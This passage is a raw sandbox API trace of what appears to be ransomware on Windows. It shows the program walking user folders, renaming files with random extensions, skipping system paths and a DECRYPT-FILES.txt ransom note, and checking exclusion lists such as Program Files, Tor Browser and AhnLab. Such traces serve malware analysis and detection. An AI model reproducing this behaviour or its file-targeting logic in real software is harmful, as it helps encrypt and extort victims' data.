returned="DisableThreadLibraryCalls" [0180.520] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.520] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.520] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.520] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.520] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.520] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.520] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.520] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.520] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.520] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.520] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.520] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.520] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.520] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.520] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.520] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.520] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.520] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.521] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.521] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.521] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.521] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.521] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.521] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.521] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.521] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.521] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.521] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.521] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.521] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.521] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.521] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.521] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.521] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.521] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6") returned 188 [0180.521] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6.5TtRr8L") returned 196 [0180.521] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xs6"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6.5TtRr8L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xs6.5ttrr8l"), dwFlags=0x0) returned 1 [0180.522] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.522] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.522] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.523] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa563120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa563120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa563120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.523] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.523] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xb0aa1fc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0aa1fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaa5fb6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0x0, dwReserved1=0x0, cFileName="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", cAlternateFileName="FDA992~1.5GN")) returned 1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="DECRYPT-FILES.txt") returned 1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="autorun.inf") returned 1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="boot.ini") returned 1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="desktop.ini") returned 1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="ntuser.dat") returned -1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="iconcache.db") returned -1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="bootsect.bak") returned 1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="ntuser.dat.log") returned -1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="thumbs.db") returned -1 [0180.523] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", lpString2="Bootfont.bin") returned 1 [0180.523] lstrlenW (lpString="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv") returned 75 [0180.523] lstrcmpiW (lpString1="5GnPv", lpString2="lnk") returned -1 [0180.523] lstrcmpiW (lpString1="5GnPv", lpString2="exe") returned -1 [0180.523] lstrcmpiW (lpString1="5GnPv", lpString2="sys") returned -1 [0180.523] lstrcmpiW (lpString1="5GnPv", lpString2="dll") returned -1 [0180.523] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0180.523] lstrlenW (lpString="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv") returned 75 [0180.523] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.523] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv" [0180.523] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5gnpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0180.524] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=325) returned 1 [0180.524] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0180.524] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.524] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.524] CloseHandle (hObject=0x288) returned 1 [0180.524] CloseHandle (hObject=0x284) returned 1 [0180.524] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.525] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xb0aa1fc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0aa1fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaa5fb6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0x0, dwReserved1=0x0, cFileName="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv", cAlternateFileName="FDA992~1.5GN")) returned 0 [0180.525] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.525] CloseHandle (hObject=0x27c) returned 1 [0180.525] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000\\", cAlternateFileName="S-1-5-~1")) returned 0 [0180.525] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.525] CloseHandle (hObject=0x274) returned 1 [0180.525] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA\\", cAlternateFileName="")) returned 0 [0180.525] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.525] CloseHandle (hObject=0x26c) returned 1 [0180.525] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.525] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.525] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0180.525] lstrcmpW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0180.525] lstrcmpW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0180.525] lstrcatW (in: lpString1="Document Building Blocks", lpString2="\\" | out: lpString1="Document Building Blocks\\") returned="Document Building Blocks\\" [0180.525] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Document Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0180.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Program Files") returned 0x0 [0180.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch=":\\Windows") returned 0x0 [0180.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Games\\") returned 0x0 [0180.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\All Users") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="AhnLab") returned 0x0 [0180.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0180.526] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.526] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\0a16c9.tmp") returned 92 [0180.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0180.526] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.526] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\DECRYPT-FILES.txt") returned 99 [0180.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.527] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0180.527] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0180.527] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeb993c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb993c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.527] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.527] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeb993c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb993c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.527] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.527] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.527] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeb993c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeb993c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb993c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.528] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.528] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.528] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.528] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.528] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.528] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.528] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 